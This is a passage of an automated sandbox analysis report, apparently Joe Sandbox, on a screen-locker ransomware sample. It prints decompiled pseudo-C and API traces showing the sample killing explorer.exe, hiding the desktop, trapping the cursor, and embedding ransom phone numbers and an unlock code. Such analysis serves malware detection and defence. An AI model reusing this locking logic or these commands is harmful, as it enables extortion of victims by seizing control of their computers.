                                                                                                          				E00406298( *((intOrPtr*)( *_t284 + 0x18)), 0, _t399);
                                                                                                          				E00406274( *((intOrPtr*)( *_t284 + 0x18)), 0x1f0, 0x2c1);
                                                                                                          				E00407EE0( *((intOrPtr*)( *_t284 + 0x18)), 1);
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x18)), 0x1f0, 0xf0caa6, _t399);
                                                                                                          				E004061CC( *((intOrPtr*)( *_t284 + 0x18)), 0xf0caa6, 0x41702c,  *_t284);
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x50)) = E00406450(0xbb8, _t399);
                                                                                                          				E00406828( *((intOrPtr*)( *_t284 + 0x18)), _t95);
                                                                                                          				_t316 =  *((intOrPtr*)( *_t284 + 0x50));
                                                                                                          				 *((intOrPtr*)(_t316 + 0x25)) =  *_t284;
                                                                                                          				 *((intOrPtr*)(_t316 + 0x21)) = E00417130;
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x30)) = E00406450(1, _t399);
                                                                                                          				E00406828( *((intOrPtr*)( *_t284 + 0x18)), _t102);
                                                                                                          				_t319 =  *((intOrPtr*)( *_t284 + 0x30));
                                                                                                          				 *((intOrPtr*)(_t319 + 0x25)) =  *_t284;
                                                                                                          				 *((intOrPtr*)(_t319 + 0x21)) = 0x416fe4;
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x2c)) = E0040675C(E00406780(E004082E0(_t387, _t102, _t399), 0x5e, 0x121), 1);
                                                                                                          				E00405F18(E00407D04(_t112), 0x808080);
                                                                                                          				_t119 = E00407D04( *((intOrPtr*)( *_t284 + 0x2c)));
                                                                                                          				_t324 =  *0x4163d4; // 0x1
                                                                                                          				E00406AFC(_t119, _t324, _t399);
                                                                                                          				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x2c))));
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x2c)), 0x5e, 0xf0caa6, _t399);
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x24)) = E00406428(E00407B6C(E00406780(E00408398(2, _t399), 0, 0), 0x23, 0x2c1, _t399), 0);
                                                                                                          				E00407A44(_t133, 0x23, 0x800000, _t399);
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x28)) = E00406428(E0040675C(E00406780(E004082E0(_t387, _t133, _t399), 8, 0xe0), 1), 2);
                                                                                                          				E00405F18(E00407D04(_t142), 0x80000005);
                                                                                                          				_t149 = E00407D04( *((intOrPtr*)( *_t284 + 0x28)));
                                                                                                          				_t337 =  *0x4163d4; // 0x1
                                                                                                          				E00406AFC(_t149, _t337, _t399);
                                                                                                          				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x28))));
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x28)), 8, 0x800000, _t399);
                                                                                                          				_t340 =  *0x416408; // 0x8
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x48)) = E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t340, _t387, _t142, _t399), 0x30, 0x1f0);
                                                                                                          				E004076E0(_t161);
                                                                                                          				E0040766C( *((intOrPtr*)( *_t284 + 0x48)), "79670416978\r\n79091516876\r\n79670416917\r\n79096507761\r\n79036688774\r\n79096507761\r\n");
                                                                                                          				_t344 =  *0x416464; // 0x8b
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x38)) = E00407B6C(E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t344, _t387, _t161, _t399), 0x150, 0), 0xa1, 0x2c1, _t399);
                                                                                                          				E00405F18(E00407D04(_t172), 0x80000000);
                                                                                                          				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x38))));
                                                                                                          				E00407F74( *((intOrPtr*)( *_t284 + 0x38)), 2);
                                                                                                          				E004075FC( *((intOrPtr*)( *_t284 + 0x38)), LoadCursorA(0, 0x7f00));
                                                                                                          				E004072F8( *((intOrPtr*)( *_t284 + 0x38)), 0);
                                                                                                          				E0040766C( *((intOrPtr*)( *_t284 + 0x38)), 0x416488);
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x3c)) = E00407B6C(E00406780(E00408320(0x41670c, _t387, _t172, _t399), 0x118, 0xa8), 0x31, 0x191, _t399);
                                                                                                          				E00406104(_t198, 0);
                                                                                                          				E0040819C(E00407D04( *((intOrPtr*)( *_t284 + 0x3c))));
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x40)) = E00406428(E00407B6C(E00406780(E00406FF0(0x416720, _t387, _t198, _t399), 0x16, 0xb0), 0, 0xd9, _t399), 1);
                                                                                                          				_t363 =  *0x416730; // 0x0
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x44)) = E00407B6C(E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x3c)), _t363, _t387, _t198, _t399), 0x16, 8), 0, 0xa1, _t399);
                                                                                                          				_t367 =  *0x416730; // 0x0
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x4c)) = E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t367, _t387, _t198, _t399), 0x38, 0x1f8);
                                                                                                          				E004076E0(_t220);
                                                                                                          				E0040766C( *((intOrPtr*)( *_t284 + 0x4c)), "123123123");
                                                                                                          				_t371 =  *0x416748; // 0x9b
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x34)) = E00407B6C(E00406780(E004070AC( *((intOrPtr*)( *_t284 + 0x18)), _t371, _t387, _t220, _t399), 0x20, 0), 0x131, 0x2c1, _t399);
                                                                                                          				E0040819C(E00407D04(_t231));
                                                                                                          				E00407F74( *((intOrPtr*)( *_t284 + 0x34)), 2);
                                                                                                          				E004075FC( *((intOrPtr*)( *_t284 + 0x34)), LoadCursorA(0, 0x7f00));
                                                                                                          				E004072F8( *((intOrPtr*)( *_t284 + 0x34)), 0);
                                                                                                          				E0040766C( *((intOrPtr*)( *_t284 + 0x34)), 0x416754);
                                                                                                          				E00406430( *((intOrPtr*)( *_t284 + 0x40)), 0x416754, E00417030,  *_t284);
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x48)), 0x131, 0x80000005, _t399);
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x44)), 0x131, 0x80000005, _t399);
                                                                                                          				E00406400( *((intOrPtr*)( *_t284 + 0x44)), 0x131, 0x80000005, E00417118,  *_t284);
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x38)), 0x131, 0x800000, _t399);
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x4c)), 0x131, 0x80000005, _t399);
                                                                                                          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t284 + 0x30)))) + 8))();
                                                                                                          				E00407A44( *((intOrPtr*)( *_t284 + 0x34)),  *((intOrPtr*)( *((intOrPtr*)( *_t284 + 0x30)))), 0xf0caa6, _t399);
                                                                                                          				E00407EAC(E00407E20( *((intOrPtr*)( *_t284 + 0x18)), 0xf0caa6, _t231), 0, 0);
                                                                                                          				E0040802C( *((intOrPtr*)( *_t284 + 0x18)), 0x116, 0, 0);
                                                                                                          				_t283 = E00416E5C( *_t284, _t284,  *_t284, _t231, 0); // executed
                                                                                                          				return _t283;
                                                                                                          			}






















                                                                                                          0x00415e7c
                                                                                                          0x00415e7f
                                                                                                          0x00415e81
                                                                                                          0x00415e83
                                                                                                          0x00415e90
                                                                                                          0x00415ead
                                                                                                          0x00415eb1
                                                                                                          0x00415eb4
                                                                                                          0x00415eb9
                                                                                                          0x00415ebf
                                                                                                          0x00415ec2
                                                                                                          0x00415ece
                                                                                                          0x00415ee2
                                                                                                          0x00415eee
                                                                                                          0x00415efd
                                                                                                          0x00415f0f
                                                                                                          0x00415f22
                                                                                                          0x00415f2c
                                                                                                          0x00415f35
                                                                                                          0x00415f38
                                                                                                          0x00415f3b
                                                                                                          0x00415f50
                                                                                                          0x00415f5a
                                                                                                          0x00415f63
                                                                                                          0x00415f66
                                                                                                          0x00415f69
                                                                                                          0x00415f99
                                                                                                          0x00415fa8
                                                                                                          0x00415fb2
                                                                                                          0x00415fb7
                                                                                                          0x00415fbd
                                                                                                          0x00415fd1
                                                                                                          0x00415fe0
                                                                                                          0x00416014
                                                                                                          0x0041601e
                                                                                                          0x00416056
                                                                                                          0x00416065
                                                                                                          0x0041606f
                                                                                                          0x00416074
                                                                                                          0x0041607a
                                                                                                          0x0041608e
                                                                                                          0x0041609d
                                                                                                          0x004160a7
                                                                                                          0x004160c6
                                                                                                          0x004160cd
                                                                                                          0x004160dc
                                                                                                          0x004160e6
                                                                                                          0x00416111
                                                                                                          0x00416120
                                                                                                          0x00416134
                                                                                                          0x00416140
                                                                                                          0x00416158
                                                                                                          0x00416164
                                                                                                          0x00416173
                                                                                                          0x004161a9
                                                                                                          0x004161b0
                                                                                                          0x004161c4
                                                                                                          0x004161ff
                                                                                                          0x00416207
                                                                                                          0x00416230
                                                                                                          0x00416238
                                                                                                          0x00416257
                                                                                                          0x0041625e
                                                                                                          0x0041626d
                                                                                                          0x00416277
                                                                                                          0x004162a2
                                                                                                          0x004162b1
                                                                                                          0x004162bd
                                                                                                          0x004162d5
                                                                                                          0x004162e1
                                                                                                          0x004162f0
                                                                                                          0x00416302
                                                                                                          0x00416311
                                                                                                          0x00416320
                                                                                                          0x00416332
                                                                                                          0x00416341
                                                                                                          0x00416350
                                                                                                          0x0041635e
                                                                                                          0x0041636b
                                                                                                          0x0041637c
                                                                                                          0x00416390
                                                                                                          0x00416399
                                                                                                          0x004163a1

                                                                                                          APIs
                                                                                                            • Part of subcall function 00407EE0: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013,00415EF3,?,?,?,00417268), ref: 00407F03
                                                                                                            • Part of subcall function 00407A44: DeleteObject.GDI32(00000000), ref: 00407A85
                                                                                                            • Part of subcall function 0040766C: SendMessageA.USER32(?,0000000C,00000000,?), ref: 00407689
                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 0041614C
                                                                                                            • Part of subcall function 004075FC: GetCursorPos.USER32 ref: 00407630
                                                                                                            • Part of subcall function 004075FC: SetCursor.USER32 ref: 0040765E
                                                                                                            • Part of subcall function 004072F8: EnableWindow.USER32(?,?), ref: 0040731E
                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 004162C9
                                                                                                            • Part of subcall function 00407E20: GetSystemMetrics.USER32(00000001), ref: 00407E2F
                                                                                                            • Part of subcall function 00407E20: GetSystemMetrics.USER32(00000000), ref: 00407E37
                                                                                                            • Part of subcall function 0040802C: SendMessageA.USER32(00000000,?,?,?), ref: 00408041
                                                                                                            • Part of subcall function 00416E5C: WinExec.KERNEL32(taskkill /F /IM explorer.exe,00000000), ref: 00416E79
                                                                                                            • Part of subcall function 00416E5C: SystemParametersInfoA.USER32(00000061,00000001,00000000,00000000), ref: 00416E97
                                                                                                            • Part of subcall function 00416E5C: FindWindowA.USER32(00000000,Program Manager), ref: 00416EA5
                                                                                                            • Part of subcall function 00416E5C: ShowWindow.USER32(00000000,00000000,00000000,00416EED,?,?,00000000), ref: 00416EAB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CursorWindow$System$LoadMessageMetricsSend$DeleteEnableExecFindInfoObjectParametersShow
                                                                                                          • String ID: +79874418224$123123123$796704169787909151687679670416917790965077617903668877479096507761$Tahoma$Times New Roman$t^A$windowssecurity
                                                                                                          • API String ID: 3507070501-296219220
                                                                                                          • Opcode ID: 5a39b68fbc3096504723c7640abd55bc9b63af0bdc9dd852676b73a232ed63b2
                                                                                                          • Instruction ID: 27c486c3e8a3f134475cd8ba4614be99faec494537bb50f6dd228413fb19958b
                                                                                                          • Opcode Fuzzy Hash: 5a39b68fbc3096504723c7640abd55bc9b63af0bdc9dd852676b73a232ed63b2
                                                                                                          • Instruction Fuzzy Hash: D1E1FF747045508FD740EB6AC4D1F5933A1EF49308B1250BAF6059F7ABCA39EC46CB9A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 21%
                                                                                                          			E00416FDD() {
                                                                                                          				intOrPtr* _t1;
                                                                                                          				signed char _t2;
                                                                                                          				signed char _t3;
                                                                                                          
                                                                                                          				L0:
                                                                                                          				while(1) {
                                                                                                          					L0:
                                                                                                          					asm("in eax, dx");
                                                                                                          					L1:
                                                                                                          					asm("out dx, al");
                                                                                                          					asm("in al, dx");
                                                                                                          					asm("out dx, eax");
                                                                                                          					asm("cld");
                                                                                                          					asm("invalid");
                                                                                                          					asm("in eax, 0xf0");
                                                                                                          					 *_t1 =  *_t1 + _t1;
                                                                                                          					_t3 = (_t3 & _t2) + _t1;
                                                                                                          					asm("sti");
                                                                                                          					asm("out dx, eax");
                                                                                                          					asm("out dx, al");
                                                                                                          				}
                                                                                                          			}






                                                                                                          0x00416fdd
                                                                                                          0x00416fdd
                                                                                                          0x00416fdd
                                                                                                          0x00416fdd
                                                                                                          0x00416fcb
                                                                                                          0x00416fcd
                                                                                                          0x00416fce
                                                                                                          0x00416fcf
                                                                                                          0x00416fd0
                                                                                                          0x00416fd1
                                                                                                          0x00416fd3
                                                                                                          0x00416fd5
                                                                                                          0x00416fd7
                                                                                                          0x00416fd9
                                                                                                          0x00416fda
                                                                                                          0x00416fdb
                                                                                                          0x00416fdb

                                                                                                          APIs
                                                                                                            • Part of subcall function 00416F28: FindWindowA.USER32(00000000,00416F9C), ref: 00416F2F
                                                                                                            • Part of subcall function 00416F28: PostMessageA.USER32 ref: 00416F3F
                                                                                                            • Part of subcall function 00416F28: FindWindowA.USER32(00000000,00416FB4), ref: 00416F4B
                                                                                                            • Part of subcall function 00416F28: PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F5B
                                                                                                            • Part of subcall function 00416F28: FindWindowA.USER32 ref: 00416F67
                                                                                                            • Part of subcall function 00416F28: PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F77
                                                                                                            • Part of subcall function 00416F28: FindWindowA.USER32(00000000,00416FD8), ref: 00416F83
                                                                                                            • Part of subcall function 00416F28: PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F93
                                                                                                          • FindWindowA.USER32(00000000,windowssecurity), ref: 00416FF4
                                                                                                          • RegisterHotKey.USER32(00000000,00000001,00000001,00000009,00000000,windowssecurity), ref: 00417002
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00417009
                                                                                                          • ClipCursor.USER32(?,00000000,?,00000000,00000001,00000001,00000009,00000000,windowssecurity), ref: 0041700F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Find$MessagePost$ClipCursorRectRegister
                                                                                                          • String ID: windowssecurity
                                                                                                          • API String ID: 505866272-157953542
                                                                                                          • Opcode ID: db7d503e70215804a70644be5847b025879004143e273917d71a57d4b60336b9
                                                                                                          • Instruction ID: 99952fe6f4652e6864b052181ed5fff2235b68c3f5804291cb8f6624d4c7a39a
                                                                                                          • Opcode Fuzzy Hash: db7d503e70215804a70644be5847b025879004143e273917d71a57d4b60336b9
                                                                                                          • Instruction Fuzzy Hash: 3ED05BA2A8971076EE1033770CC7F4B1444CB24B55F45447FB5047D0C3E4EDC454185D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 58%
                                                                                                          			E004078A0(void* __eax, void* __edx) {
                                                                                                          				long _t7;
                                                                                                          
                                                                                                          				asm("jecxz 0xc");
                                                                                                          				_t7 = CallWindowProcA( *(__eax + 0x2c),  *(__eax + 0x1c),  *(__edx + 4),  *(__edx + 8),  *(__edx + 0xc)); // executed
                                                                                                          				return _t7;
                                                                                                          			}




                                                                                                          0x004078ac
                                                                                                          0x004078b2
                                                                                                          0x004078b7

                                                                                                          APIs
                                                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 004078B2
                                                                                                          • NtdllDefWindowProc_A.NTDLL(?,?,?,?,004063B4), ref: 004078BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallNtdllProcProc_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1646280189-0
                                                                                                          • Opcode ID: da0314159296e04eb806244f3bfd1d90df0a83b9894212b70f72b2477c7770f2
                                                                                                          • Instruction ID: 9ed542ce46b8d06a915efcceea0ca04d5527b2fa981ab7a9de5197e2c1487863
                                                                                                          • Opcode Fuzzy Hash: da0314159296e04eb806244f3bfd1d90df0a83b9894212b70f72b2477c7770f2
                                                                                                          • Instruction Fuzzy Hash: 14D0C979010001AFCA466F50C800C15FF32FF48311385C7E9A2082A1728A3AE8A0EF45
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.523911815.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_560000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeMemoryVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 3963845541-0
                                                                                                          • Opcode ID: f16ea4f72fd9f77ee3e6bfefb11bb2837353a8c2a4955f4e51227f4fb8295cf0
                                                                                                          • Instruction ID: cfd3593344e4050324495d752caa2e60858b68aaaed7342eccd7a342efc22d11
                                                                                                          • Opcode Fuzzy Hash: f16ea4f72fd9f77ee3e6bfefb11bb2837353a8c2a4955f4e51227f4fb8295cf0
                                                                                                          • Instruction Fuzzy Hash: 00C0022494FA83AFE71267B0481606A7FA4BD473103190882A4938B1A2CA595A5AE63B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 00561B39
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.523911815.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_560000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706961497-0
                                                                                                          • Opcode ID: 87a464e9e795266d015608de088dbedb7efe5bd8e01e015c1cf56192b4dce25c
                                                                                                          • Instruction ID: be1fd20878c938e6a7522bfd1aa2d25c0718498d29fc5097ba978df4da1300e2
                                                                                                          • Opcode Fuzzy Hash: 87a464e9e795266d015608de088dbedb7efe5bd8e01e015c1cf56192b4dce25c
                                                                                                          • Instruction Fuzzy Hash: 09C0480881EA829AE22227A54C260AA6FA0BD4B31472909D398928B09289544A99A222
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • NtQuerySystemInformation.NTDLL ref: 00560942
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.523911815.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_560000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationQuerySystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 3562636166-0
                                                                                                          • Opcode ID: 29556be0fb6cb89fab82b7d5aabf7a8944dce987c6c265393fd37092fcbbfb8f
                                                                                                          • Instruction ID: 9ee1d06fec82f39b600ace0027cf93f5d38e4f067b2d519bca03c6d57ea727c1
                                                                                                          • Opcode Fuzzy Hash: 29556be0fb6cb89fab82b7d5aabf7a8944dce987c6c265393fd37092fcbbfb8f
                                                                                                          • Instruction Fuzzy Hash: 0EB0125080F7C35DEB03237418110156F603C7330031618C390A3C709388040B09B633
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • NtAllocateVirtualMemory.NTDLL ref: 00560077
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.523911815.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_560000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 2167126740-0
                                                                                                          • Opcode ID: 874bc4afc3144a9fab5aa6e59ae3e65bc4d8446bdfb78e8484ed9307b9948de5
                                                                                                          • Instruction ID: 8a6dce439dcd9d26c7e4693b0694d3c732727f6c8e4d353d274cd92441fd1fe2
                                                                                                          • Opcode Fuzzy Hash: 874bc4afc3144a9fab5aa6e59ae3e65bc4d8446bdfb78e8484ed9307b9948de5
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 25 40732c-40733a 26 407346-40734e 25->26 27 40733c-40733f 25->27 29 407350-407356 26->29 30 407361-40736d call 4073ce call 4073d6 26->30 27->26 28 407341-407343 27->28 28->26 29->30 31 407358-40735a 29->31 37 407372-40737a 30->37 31->30 33 40735c call 4073ce 31->33 33->30 38 4073a6-4073aa 37->38 39 40737c-407382 37->39 42 4073b5-4073b9 38->42 43 4073ac-4073b0 38->43 40 407393-4073a1 PostQuitMessage 39->40 41 407384-40738d call 4078f8 39->41 45 407576-40757f call 4078a0 40->45 41->40 41->45 46 4073bb-4073c9 SetWindowLongA 42->46 47 4073ed-4073f1 42->47 43->45 50 407596-40759a 45->50 46->50 51 4073f3-407405 call 4078a0 47->51 52 40740a-40740e 47->52 72 407595 51->72 54 407410-407419 52->54 55 407459-40745d 52->55 54->45 58 40741f-407428 call 4078f8 54->58 59 407488-407493 55->59 60 40745f-407468 call 4078c0 55->60 58->45 75 40742e-407434 58->75 64 407495-4074a8 SendMessageA 59->64 65 4074ad-4074b1 59->65 76 407581 60->76 77 40746e-407483 call 4078a0 60->77 66 407583-40758b 64->66 67 4074b3-4074bf GetWindowLongA 65->67 68 4074dd-4074e8 65->68 66->72 78 40758d-407591 66->78 67->45 73 4074c5-4074d8 SendMessageA 67->73 68->45 74 4074ee-4074f6 GetFocus 68->74 72->50 73->66 74->76 79 4074fc-40750b 74->79 75->45 80 40743a-407454 PostMessageA 75->80 76->66 77->50 78->72 84 407518-407519 79->84 85 40750d-407516 79->85 80->76 84->66 86 40751b-40752c GetKeyState * 2 84->86 85->84 86->45 88 40752e-407534 86->88 89 407536-40753a 88->89 90 40753e-407547 call 407cf4 88->90 92 40753c 89->92 93 40756f-407574 89->93 90->45 95 407549-40756d 90->95 92->45 93->66 95->45 95->93
                                                                                                          C-Code - Quality: 80%
                                                                                                          			E0040732C(void* __eax, intOrPtr* __edx) {
                                                                                                          				void* __ebx;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				void* __ebp;
                                                                                                          				signed int _t44;
                                                                                                          				void* _t46;
                                                                                                          				struct HWND__* _t47;
                                                                                                          				long _t48;
                                                                                                          				signed int _t53;
                                                                                                          				signed int _t55;
                                                                                                          				signed int _t58;
                                                                                                          				signed int _t60;
                                                                                                          				long _t63;
                                                                                                          				signed int _t66;
                                                                                                          				signed int _t71;
                                                                                                          				intOrPtr _t72;
                                                                                                          				intOrPtr _t96;
                                                                                                          				intOrPtr* _t110;
                                                                                                          				void* _t113;
                                                                                                          				intOrPtr* _t116;
                                                                                                          				intOrPtr _t121;
                                                                                                          				void* _t124;
                                                                                                          
                                                                                                          				_t113 = __eax;
                                                                                                          				_t110 = __edx;
                                                                                                          				_t116 =  *((intOrPtr*)(__eax + 0x60));
                                                                                                          				if(0 !=  *__edx && 0 ==  *((intOrPtr*)(__eax + 0x1c))) {
                                                                                                          					 *((intOrPtr*)(__eax + 0x1c)) =  *__edx;
                                                                                                          				}
                                                                                                          				_t121 =  *0x4198a4; // 0x1
                                                                                                          				if(_t121 != 0) {
                                                                                                          					_t96 =  *0x4198a8; // 0x20a0a88
                                                                                                          					asm("jecxz 0xb");
                                                                                                          					if(_t96 != _t113) {
                                                                                                          						E004073CE(_t96, _t110, _t113);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t88 = _t113;
                                                                                                          				E004073CE(_t113, _t110, _t113);
                                                                                                          				E004073D6( *((intOrPtr*)(_t113 + 0x5c)), _t110, _t113); // executed
                                                                                                          				_t44 =  *(_t110 + 4) & 0x0000ffff;
                                                                                                          				if(_t44 != 0x10) {
                                                                                                          					__eflags = _t44 - 2;
                                                                                                          					if(_t44 != 2) {
                                                                                                          						__eflags = _t44 - 0x82;
                                                                                                          						if(_t44 != 0x82) {
                                                                                                          							__eflags = _t44 - 5;
                                                                                                          							if(_t44 != 5) {
                                                                                                          								__eflags = _t44 - 0x112;
                                                                                                          								if(_t44 != 0x112) {
                                                                                                          									__eflags = _t44 - 7;
                                                                                                          									if(_t44 != 7) {
                                                                                                          										__eflags = _t44 - 0x132 - 6;
                                                                                                          										if(_t44 - 0x132 > 6) {
                                                                                                          											__eflags = _t44 - 0x111;
                                                                                                          											if(_t44 != 0x111) {
                                                                                                          												__eflags = _t44 - 0x100 - 8;
                                                                                                          												if(_t44 - 0x100 > 8) {
                                                                                                          													L41:
                                                                                                          													_t46 = E004078A0(_t113, _t110);
                                                                                                          													L46:
                                                                                                          													return _t46;
                                                                                                          												}
                                                                                                          												_t47 = GetFocus();
                                                                                                          												__eflags = _t47 -  *(_t113 + 0x1c);
                                                                                                          												if(_t47 !=  *(_t113 + 0x1c)) {
                                                                                                          													L42:
                                                                                                          													_t48 = 0;
                                                                                                          													__eflags = 0;
                                                                                                          													L43:
                                                                                                          													_push(_t48);
                                                                                                          													__eflags =  *0x4198a5;
                                                                                                          													if( *0x4198a5 == 0) {
                                                                                                          														 *_t116();
                                                                                                          													}
                                                                                                          													L45:
                                                                                                          													_pop(_t46);
                                                                                                          													goto L46;
                                                                                                          												}
                                                                                                          												__eflags =  *0x4181a8(_t47);
                                                                                                          												if(__eflags == 0) {
                                                                                                          													__eflags =  *((intOrPtr*)(_t113 + 0x64))();
                                                                                                          												}
                                                                                                          												_pop(_t48);
                                                                                                          												if(__eflags != 0) {
                                                                                                          													goto L43;
                                                                                                          												} else {
                                                                                                          													_t53 = GetKeyState(0x11);
                                                                                                          													_t55 = GetKeyState(0x12);
                                                                                                          													__eflags = _t55 | _t53;
                                                                                                          													if((_t55 | _t53) < 0) {
                                                                                                          														goto L41;
                                                                                                          													}
                                                                                                          													__eflags =  *(_t110 + 4) - 0x102;
                                                                                                          													if( *(_t110 + 4) != 0x102) {
                                                                                                          														_t58 = E00407CF4(_t113);
                                                                                                          														__eflags = _t58;
                                                                                                          														if(_t58 == 0) {
                                                                                                          															goto L41;
                                                                                                          														}
                                                                                                          														 *(_t110 + 4) - 0x100 =  *(_t110 + 4) - 0x104;
                                                                                                          														_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x70))))();
                                                                                                          														__eflags = _t60;
                                                                                                          														if(_t60 == 0) {
                                                                                                          															goto L41;
                                                                                                          														}
                                                                                                          														L40:
                                                                                                          														_t48 = 0;
                                                                                                          														 *(_t110 + 8) = 0;
                                                                                                          														goto L43;
                                                                                                          													}
                                                                                                          													__eflags =  *(_t110 + 8) - 9;
                                                                                                          													if( *(_t110 + 8) == 9) {
                                                                                                          														goto L40;
                                                                                                          													}
                                                                                                          													goto L41;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											_t63 = GetWindowLongA( *(_t110 + 0xc), 0xffffffeb);
                                                                                                          											__eflags = _t63;
                                                                                                          											if(_t63 == 0) {
                                                                                                          												goto L41;
                                                                                                          											}
                                                                                                          											_t48 = SendMessageA( *(_t110 + 0xc), 0xb005,  *(_t110 + 8),  *(_t110 + 0xc));
                                                                                                          											goto L43;
                                                                                                          										}
                                                                                                          										_t48 = SendMessageA( *(_t110 + 0xc), _t44 + 0xbc00,  *(_t110 + 8),  *(_t110 + 0xc));
                                                                                                          										goto L43;
                                                                                                          									}
